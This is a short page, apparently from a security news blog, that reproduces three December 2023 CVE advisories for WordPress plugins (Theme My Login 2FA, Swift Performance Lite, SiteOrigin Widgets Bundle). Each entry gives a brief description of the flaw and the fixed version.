https://wpscan.com/vulnerability/df892e99-c0f6-42b8-a834-fc55d1bde130 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6272

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't take too long, as the 2FA codes are 6 digits.

CVE ID : CVE-2023-6272
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/a03243ea-fee7-46e4-8037-a228afc5297a | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6289

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.

CVE ID : CVE-2023-6289
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/8c83dd57-9291-4dfc-846d-5ad47534e2ad | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6295

First published on : 18-12-2023 20:15:09
Last modified on : 18-12-2023 20:21:38

Description :
The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.

CVE ID : CVE-2023-6295
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/adc9ed9f-55b4-43a9-a79d-c7120764f47c | source : contact@wpscan.com


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports
